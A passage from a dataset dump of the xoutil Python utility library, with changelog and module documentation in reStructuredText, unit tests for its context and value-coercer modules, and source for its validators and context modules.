0.7165898680686951, "avg_line_length": 38.45454406738281, "blob_id": "f0890cb0c89a5f916d94ec6567ccf1845616f01c", "content_id": "4a7839d6756694fcc119049532aa47851eb3f952", 
"detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 434, "license_type": "permissive", "max_line_length": 75, "num_lines": 11, "path": "/docs/source/history/_changes-1.8.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add displacement operations `left shift (\\<\\<)\n <xoutil.future.datetime.TimeSpan.__lshift__>`:meth: and `right shift (>>)\n <xoutil.future.datetime.TimeSpan.__rshift__>`:meth: for\n `~xoutil.future.datetime.TimeSpan`:class:.\n\n- Add `xoutil.objects.smart_getter`:func: and\n `xoutil.objects.save_attributes`:func:.\n\n- Document experimental module `xoutil.tasking`:mod:.\n\n- Add extra (and experimental) module `xoutil.testing`:mod:.\n" }, { "alpha_fraction": 0.5324789881706238, "alphanum_fraction": 0.5489763021469116, "avg_line_length": 29.58108139038086, "blob_id": "40a09561ccf898d599beea5cb5a0472942cbdd63", "content_id": "acfc7c244ab237dac0df053b74a00cf3e27d1476", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6790, "license_type": "no_license", "max_line_length": 78, "num_lines": 222, "path": "/tests/test_context.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nimport pytest\n\n# Test concurrent access to context by several greenlets. Verify isolation in\n# the greenlets. 
We don't test isolation for threads cause that depends on\n# python's thread locals and we *rely* on its correctness.\n#\n# Since xoutil.context inspects sys.modules to test for greenlet presence we\n# need to import greenlets before importing context.\n#\ntry:\n import greenlet\nexcept ImportError:\n GREENLETS = False\nelse:\n GREENLETS = True\n\nimport sys\n\nsys.modules.pop(\"xoutil.tasking\", None)\nsys.modules.pop(\"xoutil.context\", None)\ndel sys\n\nfrom xoutil.context import context\n\n\nclass TestContext(unittest.TestCase):\n def test_simple_contexts(self):\n with context(\"CONTEXT-1\"):\n self.assertIsNot(None, context[\"CONTEXT-1\"])\n with context(\"CONTEXT-1\"):\n with context(\"context-2\"):\n self.assertIsNot(None, context[\"CONTEXT-1\"])\n self.assertIsNot(None, context[\"context-2\"])\n self.assertEqual(False, bool(context[\"context-2\"]))\n self.assertIsNot(None, context[\"CONTEXT-1\"])\n self.assertEqual(False, bool(context[\"CONTEXT-1\"]))\n\n def test_with_objects(self):\n CONTEXT1 = object()\n CONTEXT2 = object()\n with context(CONTEXT1):\n self.assertIsNot(None, context[CONTEXT1])\n with context(CONTEXT1):\n with context(CONTEXT2):\n self.assertIsNot(None, context[CONTEXT1])\n self.assertIsNot(None, context[CONTEXT2])\n self.assertEqual(False, bool(context[CONTEXT2]))\n self.assertIsNot(None, context[CONTEXT1])\n self.assertEqual(False, bool(context[CONTEXT1]))\n\n\ndef test_stacking_of_data_does_not_leak():\n c1 = \"CONTEXT-1\"\n with context(c1, a=1, b=1) as cc1:\n assert cc1[\"a\"] == 1\n with context(c1, a=2, z=\"zzz\") as cc2:\n assert cc2 is cc1\n assert cc2[\"a\"] == 2\n assert cc2[\"b\"] == 1 # Given by the upper enclosing level\n assert cc2[\"z\"] == \"zzz\"\n\n # Let's change it for this level\n cc2[\"b\"] = \"jailed!\"\n assert cc2[\"b\"] == \"jailed!\"\n\n # But in the upper level both a and b stay the same\n assert cc1[\"a\"] == 1\n assert cc1[\"b\"] == 1\n assert set(cc1) == {\"a\", \"b\"}\n\n try:\n assert cc1[\"a\"] == 1\n 
assert False\n except (IndexError, KeyError):\n pass\n\n\ndef test_data_is_an_opendict():\n c1 = object()\n with context(c1, a=1, b=1) as cc1:\n with context(c1, a=2) as cc2:\n assert cc2 is cc1\n assert cc2.a == 2\n assert cc2.b == 1 # Given by the upper enclosing level\n cc2.b = \"jaile!d\"\n assert cc1.a == 1\n assert cc1[\"b\"] == 1\n\n\ndef test_reusing_raises():\n with context(\"a\") as a:\n try:\n with a:\n pass\n assert False, \"It should have raised a RuntimeError\"\n except RuntimeError:\n pass\n except: # noqa\n assert False, \"It should have raised a RuntimeError\"\n\n\ndef test_from_dicts():\n with context.from_dicts(\"A\", dict(a=1), dict(a=2, b=1)) as c:\n assert c[\"a\"] == 1\n assert c[\"b\"] == 1\n with context.from_dicts(\"A\", dict(a=2), dict(b=2)) as c:\n assert c[\"b\"] == 1\n assert c[\"a\"] == 2\n assert c[\"b\"] == 1\n assert c[\"a\"] == 1\n\n\ndef test_from_defaults():\n with context.from_defaults(\"A\", a=1):\n with context.from_defaults(\"A\", a=2, b=1) as c:\n assert c[\"a\"] == 1\n assert c[\"b\"] == 1\n with context(\"A\", a=2) as c2:\n assert c2[\"a\"] == 2\n # It recovers the value\n assert c[\"a\"] == 1\n # and again\n assert c[\"a\"] == 1\n\n\ndef test_recover_from_runtime_bug_33():\n try:\n with context(\"A\") as c:\n with c:\n pass\n except RuntimeError:\n pass\n\n with context(\"A\"):\n pass\n\n\ndef test_null_context_is_mapping():\n from xoutil.context import NullContext\n\n dict(**NullContext())\n\n\[email protected](not GREENLETS, reason=\"greenlet is not installed\")\ndef test_greenlet_contexts():\n import random\n from xoutil.symbols import Unset\n\n calls = 0\n switches = 0\n\n class GreenletProg:\n def __init__(self, arg):\n self.arg = arg\n\n def __call__(self):\n nonlocal calls\n nonlocal switches\n calls += 1\n switches += 1\n assert \"GREEN CONTEXT\" not in context\n with context(\"GREEN CONTEXT\") as ctx:\n assert ctx.get(\"greenvar\", Unset) is Unset\n ctx[\"greenvar\"] = self.arg\n root.switch()\n switches += 1\n 
assert ctx[\"greenvar\"] == self.arg\n # list() makes KeyViews pass in Python 3+\n assert list(ctx.keys()) == [\"greenvar\"]\n\n def loop(n):\n nonlocal calls\n nonlocal switches\n greenlets = [greenlet.greenlet(run=GreenletProg(i)) for i in range(n)]\n calls = 0\n switches = 0\n while greenlets:\n pos = random.randrange(0, len(greenlets))\n gl = greenlets[pos]\n gl.switch()\n # The gl has relinquished control, so if its dead removed from the\n # list, otherwise let it be for another round.\n if gl.dead:\n del greenlets[pos]\n assert calls == n, \"There should be N calls to greenlets.\"\n assert switches == 2 * n, \"There should be 2*N switches.\"\n\n def loop_determ(n):\n nonlocal calls\n nonlocal switches\n greenlets = [greenlet.greenlet(run=GreenletProg(i)) for i in range(n)]\n pos = 0\n calls = 0\n switches = 0\n while greenlets:\n gl = greenlets[pos]\n gl.switch()\n # The gl has relinquished control, so if its dead removed from the\n # list, otherwise let it be for another round.\n if gl.dead:\n del greenlets[pos]\n # In this case we ensure there will be several concurrent\n # greenlets\n pos = ((pos + 1) % len(greenlets)) if greenlets else 0\n assert calls == n, \"There should be N calls to greenlets.\"\n assert switches == 2 * n, \"There should be 2*N switches.\"\n\n root = greenlet.greenlet(run=loop)\n root.switch(10)\n\n root = greenlet.greenlet(run=loop_determ)\n root.switch(5)\n" }, { "alpha_fraction": 0.7274633049964905, "alphanum_fraction": 0.7316561937332153, "avg_line_length": 33.07143020629883, "blob_id": "afff56421366178708f0a982d3103ce9ed9cbd7d", "content_id": "e1d9f5eb626afbc23ba10e7da2924079cd880e8d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 477, "license_type": "permissive", "max_line_length": 69, "num_lines": 14, "path": "/docs/source/CONTRIBUTORS.rst", "repo_name": "merchise-autrement/xoutil", 
"src_encoding": "UTF-8", "text": "List of contributors\n====================\n\nIf you're a contributor and you're not listed here, we appologize for\nthat omission, and ask you to add yourself to the list.\n\n- Medardo Rodríguez started this package and wrote most of it.\n\n- Dunia Trujillo has fixed bugs, tested the software and also\n contributed code.\n\n- Manuel Vázquez has contribute code and reorganize the package for\n the 1.1.x release series. He has contributed also to the\n documentation and docstring in reST format with doctests.\n" }, { "alpha_fraction": 0.6907356977462769, "alphanum_fraction": 0.7275204062461853, "avg_line_length": 42.17647171020508, "blob_id": "f0a61da4a4c90b78831646bb7ab126e870bdf700", "content_id": "ac617436c7b3cb4ccdcb764cfd415f54dabe8dba", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 734, "license_type": "permissive", "max_line_length": 78, "num_lines": 17, "path": "/docs/source/history/_changes-1.6.11.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "This is the last release of the 1.6 series. It's being synchronized with\nrelease 1.7.0 to deprecate here what's being changed there.\n\n- The `defaults` argument of `xoutil.objects.smart_copy`:func: is marked to be\n keyword-only in version 1.7.0.\n\n- Fixes a bug in `xoutil.objects.smart_copy`:func:. If `defaults` was None is\n was not being treated the same as being False, as documented. This bug was\n also fixed in version 1.7.0.\n\n- `xoutil.objects.metaclass`:func: will be moved to `xoutil.eight.meta` in\n version 1.7.0 and deprecated, it will be removed from `xoutil.object`:mod:\n in version 1.7.1.\n\n\n- This release will be the last to support Python 3.1, 3.2 and 3.3. 
Support\n will be kept for Python 2.7 and Python 3.4.\n" }, { "alpha_fraction": 0.7192816734313965, "alphanum_fraction": 0.7230623960494995, "avg_line_length": 39.69230651855469, "blob_id": "322b7ac76122572a9cf4a147ed64f16fcd152ba9", "content_id": "549e2a77c03df70a4e58251869970d50ec3a323c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1058, "license_type": "permissive", "max_line_length": 78, "num_lines": 26, "path": "/docs/source/xotl.tools/fp/option.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fp.option`:mod: - Functional Programming Option Type\n================================================================\n\n.. automodule:: xotl.tools.fp.option\n :members:\n\n\nFurther Notes\n-------------\n\nIt could be thought that this kind of concept is useless in Python because the\ndynamic nature of the language, but always there are certain logic systems\nthat need to wrap \"correct\" false values and \"incorrect\" true values.\n\nAlso, in functional programming, errors can be reasoned in a new way: more\nlike as *error values* than in *exception handling*. 
Where the `Maybe`:class:\ntype expresses the failure possibility through `Wrong`:class: instances\nencapsulating errors.\n\nWhen receiving a `Wrong`:class: instance encapsulating an error, and want to\nrecover the *exception propagation style* -instead of continue in *pure\nfunctional programming*-, to re-raise the exception, instead the `raise`\nPython statement, use `~xotl.tools.eight.errors.throw`:func:.\n\nSee https://en.wikipedia.org/wiki/Monad_%28functional_programming%29#\\\nThe_Maybe_monad\n" }, { "alpha_fraction": 0.656862735748291, "alphanum_fraction": 0.686274528503418, "avg_line_length": 21.66666603088379, "blob_id": "ebe1433d91bd014c52b301e101ec9399890b86ee", "content_id": "f2b31ea1365cc639a0b24a30f0507e016f204c02", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 204, "license_type": "permissive", "max_line_length": 70, "num_lines": 9, "path": "/docs/source/history/_changes-1.6.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the module `xoutil.records`:mod:.\n\n- Deleted deprecated ``xoutil.compat``.\n\n\n- Deprecate the `xoutil.six`. 
It will removed in 1.7.0 (probably next\n release).\n\n Now xoutil requires `six` 1.8.0.\n" }, { "alpha_fraction": 0.729468584060669, "alphanum_fraction": 0.739130437374115, "avg_line_length": 68, "blob_id": "116c4c248f65460f379f9a872e4363f8e0130a7d", "content_id": "bbdf66539d2028de791532947c211722cbf13e8f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 207, "license_type": "permissive", "max_line_length": 70, "num_lines": 3, "path": "/docs/source/history/_changes-1.8.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #24: `~xoutil.future.datetime.TimeSpan`:class: should always\n return a `datetime.date`:class: for its `start_date` and `end_date`\n attribute. Even if initialized with `datetime.datetime`:class:\n" }, { "alpha_fraction": 0.6861538290977478, "alphanum_fraction": 0.744615375995636, "avg_line_length": 45.42856979370117, "blob_id": "7b98ece47b65c0c7fa39b55eadd868d59ef89c36", "content_id": "237a2c29894d6fe54b281aff8ace7ad42bf6440f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 325, "license_type": "no_license", "max_line_length": 86, "num_lines": 7, "path": "/xotl/tools/reprlib.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "# Back-ported from Python 3.2.\n# Copyright (c) 2001-2012, 2014-2016, Python Software Foundation; All rights reserved.\n# Retains the licence of the Python Software Foundation.\n# flake8: noqa\n\"\"\"Redo the builtin repr() (representation) but with limits on most sizes.\"\"\"\n\nfrom reprlib import Repr, repr, recursive_repr, __all__\n" }, { "alpha_fraction": 0.4647963345050812, "alphanum_fraction": 0.4960884749889374, "avg_line_length": 32.09821319580078, "blob_id": "6a039f5656d33eb0862b784941917b129b34aa74", "content_id": "f59a94d18e595c8c94572ed754038c5897cf4f1d", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3708, "license_type": "no_license", "max_line_length": 75, "num_lines": 112, "path": "/tests/test_clisp.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\n\n\nclass TestCLisp(unittest.TestCase):\n def test_basic_coercers(self):\n from xoutil.values import (\n identity_coerce,\n void_coerce,\n coercer,\n vouch,\n t,\n int_coerce,\n float_coerce,\n create_int_range_coerce,\n istype,\n typecast,\n iterable,\n mapping,\n create_unique_member_coerce,\n nil,\n )\n\n d = {\"1\": 2, 3.0: \"4\", 5.0 + 0j: 7.3 + 0j, 1: \"2\"}\n s = {1, \"2\", 3.0, \"1\"}\n l = [1, \"2\", 3.0, \"1\", \"x10\"]\n number_types = (int, float, complex)\n mc = mapping(int_coerce, float_coerce)\n uint_coerce = create_unique_member_coerce(int_coerce, d)\n mcu = mapping(uint_coerce, float_coerce)\n ic = iterable(int_coerce)\n age_coerce = create_int_range_coerce(0, 100)\n text_coerce = coercer(str)\n isnumber = istype(number_types)\n numbercast = typecast(number_types)\n # TODO: don't use isinstance\n self.assertEqual(\n all(\n isinstance(c, coercer)\n for c in (\n mc,\n mcu,\n uint_coerce,\n ic,\n age_coerce,\n text_coerce,\n identity_coerce,\n void_coerce,\n int_coerce,\n float_coerce,\n )\n ),\n True,\n )\n self.assertEqual(mc(dict(d)), {1: 2.0, 3: 4.0, 5: 7.3})\n self.assertIs(mcu(d), nil)\n self.assertEqual(mcu.scope, ({\"1\": 2}, uint_coerce))\n self.assertEqual(ic(s), {1, 2, 3})\n self.assertIs(ic(l), nil)\n self.assertIs(ic.scope, l[-1])\n self.assertEqual(l, [1, 2, 3, 1, \"x10\"])\n self.assertIs(age_coerce(80), 80)\n self.assertFalse(t(age_coerce(120)))\n 
self.assertIs(vouch(age_coerce, 80), 80)\n with self.assertRaises(TypeError):\n vouch(age_coerce, 120)\n self.assertIs(isnumber(5), 5)\n self.assertIs(isnumber(5.1), 5.1)\n with self.assertRaises(TypeError):\n vouch(isnumber, \"5.1\")\n self.assertIs(numbercast(5), 5)\n self.assertIs(numbercast(5.1), 5.1)\n self.assertEqual(numbercast(\"5.1\"), 5.1)\n self.assertIs(numbercast.scope, float)\n\n def test_compound_coercers(self):\n from xoutil.values import (\n coercer,\n compose,\n some,\n combo,\n iterable,\n typecast,\n int_coerce,\n float_coerce,\n nil,\n )\n\n isstr = coercer(str)\n strcast = typecast(str)\n toint = compose(isstr, int_coerce)\n isint = some(isstr, int_coerce)\n hyphenjoin = coercer(lambda arg: \"-\".join(arg))\n intjoin = compose(iterable(strcast), hyphenjoin)\n cb = combo(strcast, int_coerce, float_coerce)\n self.assertEqual(toint(\"10\"), 10)\n self.assertIs(toint(10), nil)\n self.assertEqual(toint.scope, (10, isstr))\n self.assertEqual(isint(\"10\"), \"10\")\n self.assertEqual(isint.scope, isstr)\n self.assertEqual(isint(10), 10)\n self.assertEqual(isint.scope, int_coerce)\n self.assertEqual(intjoin(2 * i + 1 for i in range(5)), \"1-3-5-7-9\")\n self.assertEqual(cb([1, \"2.0\", 3, 4]), [\"1\", 2, 3.0])\n" }, { "alpha_fraction": 0.46464645862579346, "alphanum_fraction": 0.46464645862579346, "avg_line_length": 38.599998474121094, "blob_id": "e99e1d4557fd5b64afd553aef4969ee5b0cbfcfa", "content_id": "4455086e30cc6e11422fc9e5bf75869a16eb86cb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 198, "license_type": "permissive", "max_line_length": 72, "num_lines": 5, "path": "/docs/source/xotl.tools/values/ids.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.values.ids`:mod: -- unique identifiers at different 
contexts\n========================================================================\n\n.. automodule:: xotl.tools.values.ids\n :members:\n" }, { "alpha_fraction": 0.6573875546455383, "alphanum_fraction": 0.6573875546455383, "avg_line_length": 26.47058868408203, "blob_id": "cf5f209fd7613aff993b5ae0bc650dc0908e7dab", "content_id": "84bfb54b78fcb51a19ade327662c2533a809502f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 467, "license_type": "permissive", "max_line_length": 78, "num_lines": 17, "path": "/docs/source/xotl.tools/infinity.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.infinity`:mod: - An infinite value\n==============================================\n\n.. module:: xotl.tools.infinity\n\n.. data:: Infinity\n\n The positive infinite value. The negative infinite value is ``-Infinity``.\n\n These values are only sensible for comparison. Arithmetic is not\n supported.\n\n The type of values that is comparable with `Infinity`:obj: is controlled by\n the ABC `InfinityComparable`:class:.\n\n\n.. 
autoclass:: InfinityComparable\n" }, { "alpha_fraction": 0.5823702812194824, "alphanum_fraction": 0.5883752703666687, "avg_line_length": 28.518394470214844, "blob_id": "95671b504ded87bd18f3630ce6b67664b308582d", "content_id": "fecb64dc90889b25754e43833d37bdf37adecfe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8828, "license_type": "no_license", "max_line_length": 78, "num_lines": 299, "path": "/xotl/tools/validators/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some generic value validators and regular expressions and validation\nfunctions for several identifiers.\n\n\"\"\"\n\n\n# TODO: Check next import, it looks like one of the modules must be deprecated\nfrom xotl.tools.validators.identifiers import ( # noqa\n is_valid_identifier,\n check_identifier,\n is_valid_full_identifier,\n is_valid_public_identifier,\n is_valid_slug,\n)\n\n\ndef _adorn_checker_name(name):\n \"\"\"Make more attractive or legible a checker name.\"\"\"\n res = name.replace(\"_AND_\", \" & \")\n res = res.replace(\"_OR_\", \" | \")\n return res.replace(\"<lambda>\", \"<λ>\")\n\n\ndef _get_checker_name(checker):\n \"\"\"Return a nice name for a `checker`.\n\n A `checker` could be a type, a tuple of types, a callable or a list of\n other checkers.\n\n \"\"\"\n l = lambda o: str(\"(%s)\" % o.join(_get_checker_name(c) for c in checker))\n if isinstance(checker, list):\n return l(\"_AND_\")\n elif isinstance(checker, tuple):\n return l(\"_OR_\")\n else:\n from xotl.tools.future.inspect import safe_name\n\n res = safe_name(checker, affirm=True)\n if not isinstance(checker, type):\n assert 
callable(checker)\n if \"lambda\" in res:\n from inspect import getargspec\n\n args = getargspec(checker).args\n assert len(args) == 1\n res = str(\"%s(%s)\" % (res, args[0]))\n return res\n\n\ndef is_type(cls):\n \"\"\"Return a validator with the same name as the type given as argument\n `value`.\n\n :param cls: Class or type or tuple of several types.\n\n \"\"\"\n\n def inner(obj):\n \"\"\"Check is a value object is a valid instance of (%s).\"\"\"\n return isinstance(obj, cls)\n\n name = _get_checker_name(cls)\n inner.__name__ = name\n inner.__doc__ = inner.__doc__ % name\n return inner\n\n\n# TODO: With this new function, `is_type` could be deprecated\n# TODO: Migrate to a class\ndef predicate(*checkers, **kwargs):\n \"\"\"Return a validation checker for types and simple conditions.\n\n :param checkers: A variable number of checkers; each one could be:\n\n - A type, or tuple of types, to test valid values with\n ``isinstance(value, checker)``\n\n - A set or mapping of valid values, the value is valid if contained in\n the checker.\n\n - A tuple of other inner checkers, if any of the checkers validates a\n value, the value is valid (OR).\n\n - A list of other inner checkers, all checkers must validate the value\n (AND).\n\n - A callable that receives the value and returns True if the value is\n valid.\n\n - ``True`` and ``False`` could be used as checkers always validating\n or invalidating the value.\n\n An empty list or no checker is synonym of ``True``, an empty tuple,\n set or mapping is synonym of ``False``.\n\n :param name: Keyword argument to be used in case of error; will be the\n argument of `ValueError` exception; could contain the placeholders\n ``{value}`` and ``{type}``; a default value is used if this argument\n is not given.\n\n :param force_name: Keyword argument to force a name if not given.\n\n In order to obtain good documentations, use proper names for functions and\n lambda arguments.\n\n With this function could be built real type checkers, 
for example::\n\n >>> is_valid_age = predicate((int, float), lambda age: 0 < age <= 120)\n >>> is_valid_age(100)\n True\n\n >>> is_valid_age(130)\n False\n\n >>> always_true = predicate(True)\n >>> always_true(False)\n True\n\n >>> always_false = predicate(False)\n >>> always_false(True)\n False\n\n >>> always_true = predicate()\n >>> always_true(1)\n True\n\n >>> always_true('any string')\n True\n\n >>> always_false = predicate(())\n >>> always_false(1)\n False\n\n >>> always_false('any string')\n False\n\n \"\"\"\n from xotl.tools.symbols import boolean\n from xotl.tools.future.collections import Set, Mapping\n\n def inner(obj):\n \"\"\"Check is `obj` is a valid instance for a set of checkers.\"\"\"\n\n def valid(chk):\n if isinstance(chk, boolean):\n res = bool(chk)\n elif isinstance(chk, type):\n res = isinstance(obj, chk)\n elif isinstance(chk, tuple):\n if all(isinstance(c, type) for c in chk):\n res = isinstance(obj, chk)\n else:\n res = any(valid(c) for c in chk)\n elif isinstance(chk, list):\n res = all(valid(c) for c in chk)\n elif isinstance(chk, (Set, Mapping)):\n res = obj in chk\n else:\n res = chk(obj)\n return res\n\n # XXX: WTF, must be ``all(valid(chk) for chk in checkers)``\n return next((chk for chk in checkers if not valid(chk)), None) is None\n\n name = kwargs.get(\"name\")\n if name is None and kwargs.get(\"force_name\"):\n name = _get_checker_name(list(checkers))\n if name is not None:\n inner.__name__ = name\n return inner\n\n\ndef check(value, validator, msg=None):\n \"\"\"Check a `value` with a `validator`.\n\n Argument `validator` could be a callable, a type, or a tuple of types.\n\n Return True if the value is valid.\n\n Examples::\n\n >>> check(1, int)\n True\n\n >>> check(10, lambda x: x <= 100, 'must be less than or equal to 100')\n True\n\n >>> check(11/2, (int, float))\n True\n\n \"\"\"\n if isinstance(validator, (type, tuple)):\n checker = is_type(validator)\n else:\n checker = validator\n if checker(value):\n return True\n 
else:\n from xotl.tools.future.inspect import safe_name\n\n if not msg:\n # TODO: Use the name of validator with `inspect.getattr_static`\n # when `xotl.tools.future` is ready\n msg = 'Invalid value \"%s\" of type \"%s\"'\n msg = msg.format(value=value, type=safe_name(value, affirm=True))\n raise ValueError(msg)\n\n\n# TODO: deprecate `check` in favor of `ok`.\ndef ok(value, *checkers, **kwargs):\n \"\"\"Validate a value with several checkers.\n\n Return the value if it is Ok, or raises an `ValueError` exception if not.\n\n Arguments:\n\n :param value: the value to validate\n\n :param checkers: a variable number of checkers (at least one), each one\n could be a type, a tuple of types of a callable that receives the\n value and returns if the value is valid or not. In order the value is\n considered valid, all checkers must validate the value.\n\n :param message: keyword argument to be used in case of error; will be the\n argument of `ValueError` exception; could contain the placeholders\n ``{value}`` and ``{type}``; a default value is used if this\n argument is not given.\n\n :param msg: an alias for \"message\"\n\n :param extra_checkers: In order to create validators using `partial`.\n Must be a tuple.\n\n Keyword arguments are not validated to be correct.\n\n This function could be used with type-definitions for arguments, see\n `xotl.tools.fp.prove.semantic.TypeCheck`:class:.\n\n Examples::\n\n >>> ok(1, int)\n 1\n\n >>> ok(10, int, lambda x: x < 100, message='Must be integer under 100')\n 10\n\n >>> ok(11/2, (int, float))\n 5.5\n\n >>> ok(11/2, int, float)\n 5.5\n\n >>> try:\n ... res = ok(11/2, int)\n ... except ValueError:\n ... 
res = '---'\n >>> res\n '---'\n\n \"\"\"\n extra_checkers = kwargs.get(\"extra_checkers\", ())\n pred = predicate(*(checkers + extra_checkers))\n if pred(value):\n return value\n else:\n from xotl.tools.future.itertools import multi_get as get\n from xotl.tools.future.inspect import safe_name\n\n msg = next(get(kwargs, \"message\", \"msg\"), \"Invalid {type}: {value}!\")\n msg = msg.format(value=value, type=safe_name(value, affirm=True))\n raise ValueError(msg)\n\n\ndef check_no_extra_kwargs(kwargs):\n \"\"\"Check that no extra keyword arguments are still not processed.\n\n For example::\n\n >>> from xotl.tools.validators import check_no_extra_kwargs\n >>> def only_safe_arg(**kwargs):\n ... safe = kwargs.pop('safe', False)\n ... check_no_extra_kwargs(kwargs)\n ... print('OK for safe:', safe)\n\n \"\"\"\n if kwargs:\n plural = \"\" if len(kwargs) == 1 else \"s\"\n msg = 'Unexpected keyword argument%s: \"%s\"!'\n raise TypeError(msg % (plural, \", \".join(kwargs)))\n" }, { "alpha_fraction": 0.5723556280136108, "alphanum_fraction": 0.5736534595489502, "avg_line_length": 26.51785659790039, "blob_id": "1333ad9e43da628beb6657a10c15fb2dd538ced8", "content_id": "d82cea2efd6f90ddbd40706c2012f07694f884d8", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1541, "license_type": "permissive", "max_line_length": 77, "num_lines": 56, "path": "/docs/source/xotl.tools/fp/tools.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "==============================================================\n `xotl.tools.fp.tools`:mod: -- High-level pure function tools\n==============================================================\n\n.. automodule:: xotl.tools.fp.tools\n\n.. class:: compose(*funcs)\n\n Composition of several functions.\n\n Functions are composed right to left. 
A composition of zero functions\n gives back the `identity`:func: function.\n\n Rules must be fulfilled (those inner `all`)::\n\n >>> x = 15\n >>> f, g, h = x.__add__, x.__mul__, x.__xor__\n >>> all((compose() is identity,\n ...\n ... # identity functions are optimized\n ... compose(identity, f, identity) is f,\n ...\n ... compose(f) is f,\n ... compose(g, f)(x) == g(f(x)),\n ... compose(h, g, f)(x) == h(g(f(x)))))\n True\n\n If any \"intermediate\" function returns an instance of:\n\n - `pos_args`:class:\\ : it's expanded as variable positional arguments to\n the next function.\n\n - `kw_args`:class:\\ : it's expanded as variable keyword arguments to the\n next function.\n\n - `full_args`:class:\\ : it's expanded as variable positional and keyword\n arguments to the next function.\n\n The expected usage of these is **not** to have function return those types\n directly, but to use them when composing functions that return tuples and\n expect tuples.\n\n\n.. autofunction:: identity\n\n.. autofunction:: fst\n\n.. autofunction:: snd\n\n.. autofunction:: constant\n\n.. autoclass:: pos_args\n\n.. autoclass:: kw_args\n\n.. 
autoclass:: full_args\n" }, { "alpha_fraction": 0.5555198788642883, "alphanum_fraction": 0.560815155506134, "avg_line_length": 25.978355407714844, "blob_id": "77f95b60dcc077090312c81f8d24a990d3c5112b", "content_id": "d9551f3202b1c9ccca86451c5a351b4414bd2940", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6233, "license_type": "no_license", "max_line_length": 79, "num_lines": 231, "path": "/xotl/tools/context.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"A context manager for execution context flags.\"\"\"\n\nfrom xotl.tools.tasking import local\nfrom xotl.tools.future.collections import StackedDict, Mapping\n\n__all__ = (\"Context\", \"context\", \"NullContext\")\n\n\nclass LocalData(local):\n \"\"\"Thread-local data for contexts.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.contexts = {}\n\n\n_data = LocalData()\n\n\nclass MetaContext(type(StackedDict)): # type: ignore\n def __len__(self):\n return len(_data.contexts)\n\n def __iter__(self):\n return iter(_data.contexts)\n\n def __getitem__(self, name):\n return _data.contexts.get(name, _null_context)\n\n def __contains__(self, name):\n \"\"\"Basic support for the 'A in context' idiom.\"\"\"\n return bool(self[name])\n\n\nclass Context(StackedDict, metaclass=MetaContext):\n \"\"\"An execution context manager with parameters (or flags).\n\n Use as::\n\n >>> SOME_CONTEXT = object()\n >>> from xotl.tools.context import context\n >>> with context(SOME_CONTEXT):\n ... if context[SOME_CONTEXT]:\n ... 
